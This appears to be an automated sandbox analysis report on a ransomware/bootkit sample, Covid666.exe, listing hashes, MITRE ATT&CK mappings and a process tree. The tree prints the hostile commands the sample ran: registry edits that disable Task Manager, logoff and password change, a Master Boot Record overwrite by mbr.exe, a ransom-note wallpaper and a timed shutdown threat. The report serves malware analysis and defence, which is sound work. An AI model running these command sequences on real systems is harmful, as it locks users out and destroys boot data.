70971148ed1fadb17a1de707b03b0b61bcf9d523c540b9bf4e411b5bb0dda5f0

Analysis

max time kernel
244s
max time network
249s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
06-03-2024 18:35

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Covid666.exe
Size

687KB
MD5

0c303ae1347c0395a96f3eb38d26d7ed
SHA1

c8cf473a22fc86ddad00ec286e94422f4b7d5c59
SHA256

1eefaeb98524277d1aeb459b6e4a31472ce2f4ff15f8f45b051e1c8a021c8fa7
SHA512

57e9ca4e5339164a6c3e5f53b8f30410d86139355390e17a2926d5b2263a511f0d47b26f70e95a5cf8daf4c365fec7f057614636e6f092d8320fcdda8debea93
SSDEEP

12288:U7M23cFQpIn5tghlAjyCey1vLd31utolsqHzc30qOocuXi7oS:Ug2sq2nohlAtrvLjutQtI3bOoli

Score

8^/10

bootkit evasion persistence ransomware upx

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Executes dropped EXE 2 IoCs

pid	Process
2116	mbr.exe
2448	MainWindow.exe

Loads dropped DLL 4 IoCs

pid	Process
3068	cmd.exe
3068	cmd.exe
3068	cmd.exe
3068	cmd.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral9/memory/2256-0-0x0000000000400000-0x000000000064F000-memory.dmp	upx
behavioral9/memory/2256-39-0x0000000000400000-0x000000000064F000-memory.dmp	upx

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	mbr.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 6 IoCs

Modify Registry

T1112

pid	Process
2508	reg.exe
2620	reg.exe
2696	reg.exe
2700	reg.exe
2604	reg.exe
2552	reg.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2408	shutdown.exe
Token: SeRemoteShutdownPrivilege	2408	shutdown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2448	MainWindow.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2256 wrote to memory of 3068	2256	Covid666.exe	28
PID 2256 wrote to memory of 3068	2256	Covid666.exe	28
PID 2256 wrote to memory of 3068	2256	Covid666.exe	28
PID 2256 wrote to memory of 3068	2256	Covid666.exe	28
PID 3068 wrote to memory of 2620	3068	cmd.exe	30
PID 3068 wrote to memory of 2620	3068	cmd.exe	30
PID 3068 wrote to memory of 2620	3068	cmd.exe	30
PID 3068 wrote to memory of 2620	3068	cmd.exe	30
PID 3068 wrote to memory of 2696	3068	cmd.exe	31
PID 3068 wrote to memory of 2696	3068	cmd.exe	31
PID 3068 wrote to memory of 2696	3068	cmd.exe	31
PID 3068 wrote to memory of 2696	3068	cmd.exe	31
PID 3068 wrote to memory of 2700	3068	cmd.exe	32
PID 3068 wrote to memory of 2700	3068	cmd.exe	32
PID 3068 wrote to memory of 2700	3068	cmd.exe	32
PID 3068 wrote to memory of 2700	3068	cmd.exe	32
PID 3068 wrote to memory of 2604	3068	cmd.exe	33
PID 3068 wrote to memory of 2604	3068	cmd.exe	33
PID 3068 wrote to memory of 2604	3068	cmd.exe	33
PID 3068 wrote to memory of 2604	3068	cmd.exe	33
PID 3068 wrote to memory of 2552	3068	cmd.exe	34
PID 3068 wrote to memory of 2552	3068	cmd.exe	34
PID 3068 wrote to memory of 2552	3068	cmd.exe	34
PID 3068 wrote to memory of 2552	3068	cmd.exe	34
PID 3068 wrote to memory of 2116	3068	cmd.exe	35
PID 3068 wrote to memory of 2116	3068	cmd.exe	35
PID 3068 wrote to memory of 2116	3068	cmd.exe	35
PID 3068 wrote to memory of 2116	3068	cmd.exe	35
PID 3068 wrote to memory of 2692	3068	cmd.exe	36
PID 3068 wrote to memory of 2692	3068	cmd.exe	36
PID 3068 wrote to memory of 2692	3068	cmd.exe	36
PID 3068 wrote to memory of 2692	3068	cmd.exe	36
PID 3068 wrote to memory of 2556	3068	cmd.exe	37
PID 3068 wrote to memory of 2556	3068	cmd.exe	37
PID 3068 wrote to memory of 2556	3068	cmd.exe	37
PID 3068 wrote to memory of 2556	3068	cmd.exe	37
PID 3068 wrote to memory of 2556	3068	cmd.exe	37
PID 3068 wrote to memory of 2556	3068	cmd.exe	37
PID 3068 wrote to memory of 2556	3068	cmd.exe	37
PID 3068 wrote to memory of 2532	3068	cmd.exe	38
PID 3068 wrote to memory of 2532	3068	cmd.exe	38
PID 3068 wrote to memory of 2532	3068	cmd.exe	38
PID 3068 wrote to memory of 2532	3068	cmd.exe	38
PID 3068 wrote to memory of 2532	3068	cmd.exe	38
PID 3068 wrote to memory of 2532	3068	cmd.exe	38
PID 3068 wrote to memory of 2532	3068	cmd.exe	38
PID 3068 wrote to memory of 2560	3068	cmd.exe	39
PID 3068 wrote to memory of 2560	3068	cmd.exe	39
PID 3068 wrote to memory of 2560	3068	cmd.exe	39
PID 3068 wrote to memory of 2560	3068	cmd.exe	39
PID 3068 wrote to memory of 2560	3068	cmd.exe	39
PID 3068 wrote to memory of 2560	3068	cmd.exe	39
PID 3068 wrote to memory of 2560	3068	cmd.exe	39
PID 3068 wrote to memory of 2564	3068	cmd.exe	40
PID 3068 wrote to memory of 2564	3068	cmd.exe	40
PID 3068 wrote to memory of 2564	3068	cmd.exe	40
PID 3068 wrote to memory of 2564	3068	cmd.exe	40
PID 3068 wrote to memory of 2564	3068	cmd.exe	40
PID 3068 wrote to memory of 2564	3068	cmd.exe	40
PID 3068 wrote to memory of 2564	3068	cmd.exe	40
PID 3068 wrote to memory of 2508	3068	cmd.exe	41
PID 3068 wrote to memory of 2508	3068	cmd.exe	41
PID 3068 wrote to memory of 2508	3068	cmd.exe	41
PID 3068 wrote to memory of 2508	3068	cmd.exe	41

C:\Users\Admin\AppData\Local\Temp\Covid666.exe
"C:\Users\Admin\AppData\Local\Temp\Covid666.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2256
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\9DF4.tmp\Covid666.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3068
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2620
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2696
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2700
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2604
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2552
- - C:\Users\Admin\AppData\Local\Temp\9DF4.tmp\mbr.exe
    mbr.exe
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    PID:2116
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2692
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2560
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2508
- - C:\Users\Admin\AppData\Local\Temp\9DF4.tmp\MainWindow.exe
    MainWindow.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2448
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 240 /c "You have only 4 minutes to complete the payment or all your data is lost forever"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2408
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2848
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:760
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:548
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:568

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1224

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9DF4.tmp\Covid666.bat

Filesize
1KB

MD5
5e19b2eeb24514e87aa6039bd012fa6e

SHA1
4f8ad456f7050a8fa572043dc42a0ae5bd0dc6a5

SHA256
0cabbe47e3a8799502084b4c691634d16dc3bf317fc17d9d898ed336a476c778

SHA512
8c9faabd001af53f081c2fe38bd3c930de8c4aa1813afb66b106ffbdd796040b1dcc11ddccf965edf100283f38e587d4d937cbb4455379317ce5a5b59b7c8cc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\9DF4.tmp\MainWindow.exe

Filesize
20KB

MD5
23ab00deb47223ba73b700eb371fb0fe

SHA1
ba2e077c3790bdae4083fe9283f38a13efdcc4b1

SHA256
d42807867bd69d5db2605e4e6f39e5f70e0cc9db0cac9216fd6a9cd8cc324e0d

SHA512
d37252a1620f532230160f16c5d87fc79928842c0af41805c1fed1115ef0cfca6767d48c5d9ce6c6a4b042cd152cd1a2f9b49ad9380b08980680b26c5a4805c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\9DF4.tmp\mbr.exe

Filesize
640KB

MD5
7f81d488bb240698b7151b6c138a5dbc

SHA1
973b527c3f4f1ebf9067470dbe785dc77148d0d9

SHA256
053f392fd682f08eb49dc36048bfc6ec1b03f14daf45be17a4b91d356c7ed574

SHA512
93450bfa62ed439149b2db3561ea06c742fd07572d45aa315a7b3872fbd5708f12a9ddae8bd33798a4a007f6255a8588e25c9c0003b96e0c4f4ddef019c84622

Download Submit
C:\Users\Admin\AppData\Local\Temp\9DF4.tmp\mbr.exe

Filesize
595KB

MD5
a42de1c7690ec44d0e6cae93a1c37dd7

SHA1
2102e4a5d871cdb9b14a8ba1867c889703455048

SHA256
b2c7a46955c68b852236260f917ce18fd8be30ac44eec4ccb045c84515b68942

SHA512
449f60e0aeb7a42ce7e7937bcd7010515a3e4436e8c447b89a90c6e1b10d49c7e5df28ca864cffd20736eb12fc7bff530c179a5b78ebdb21bc8269da2dc2cda9

Download Submit
C:\Users\Admin\AppData\Local\Temp\9DF4.tmp\note.bmp

Filesize
597KB

MD5
38a9793bf8b74bca842c732047a06833

SHA1
a9b77ca469b00cb66744947b2e3e8f0214c3f515

SHA256
52949e1f75d8b90b57dc00a9f5a499f31ecbdf9106fa8ca699c1dc71d23d4e03

SHA512
422d50a49fdaece94a5d34d533ae77c58682f165b54d0eb8b712fceb89e51c6a6d956fcbc4ca38f63afd7a5ae3c188415e8709db9c1220a8b6384353719a3f44

Download Submit
\??\c:\note.bmp

Filesize
367KB

MD5
b98095c83a5be22454734dbe2c6fff42

SHA1
df92dc3623640f9e75d7fca72c2ad9299a3221b8

SHA256
1e569a8c22eeae133b3472b8a83b84ee2fe3b71424c86cbdf86f408009ecd59e

SHA512
566406680710f28eb2b7744a4f9fe25274899942165dc812975aa265a7de08cf6f6bb0d9ade679f1ec00da043249435e7aa09c85265cfb66a4fc591e6937372d

Download Submit
\Users\Admin\AppData\Local\Temp\9DF4.tmp\mbr.exe

Filesize
530KB

MD5
10bd7731e9232dd11f3ea732bd8426af

SHA1
06d80fedd31e3aebe4fdf8ca2b8dd9c82948c7a2

SHA256
54ba945029412c410e577cde02e56d6f57739bf57b98fddde67656197397cd94

SHA512
c4444ffd5662c229db574eb1b343a9d329cd5dc79e64fc653ccccab4f2803206eca07d072843ed25797149753fd6dbc831589f9bb658020926e9e544ba9353db

Download Submit
\Users\Admin\AppData\Local\Temp\9DF4.tmp\mbr.exe

Filesize
650KB

MD5
1932cfb6ac5162f52ef0bdce16183d6a

SHA1
e12acaf67cc92c410167cedb12a51f6c31739929

SHA256
3e1e317c1478625a2e57fb63e0c1f1eeb5b70176a7fe722f5e526d5eeb626683

SHA512
5236da43cda03e29c4c1976e9ae50ace9a112a2ef30b99ddd5fc4f2973600c6e31ed8f281b9705a59aefedbdaff13ddf4aee1c5df87492d8096d7e803dcfc600

Download Submit
memory/1224-40-0x0000000002A40000-0x0000000002A41000-memory.dmp

Filesize
4KB

Download
memory/2116-31-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/2256-0-0x0000000000400000-0x000000000064F000-memory.dmp

Filesize
2.3MB

Download
memory/2256-39-0x0000000000400000-0x000000000064F000-memory.dmp

Filesize
2.3MB

Download
memory/2696-41-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads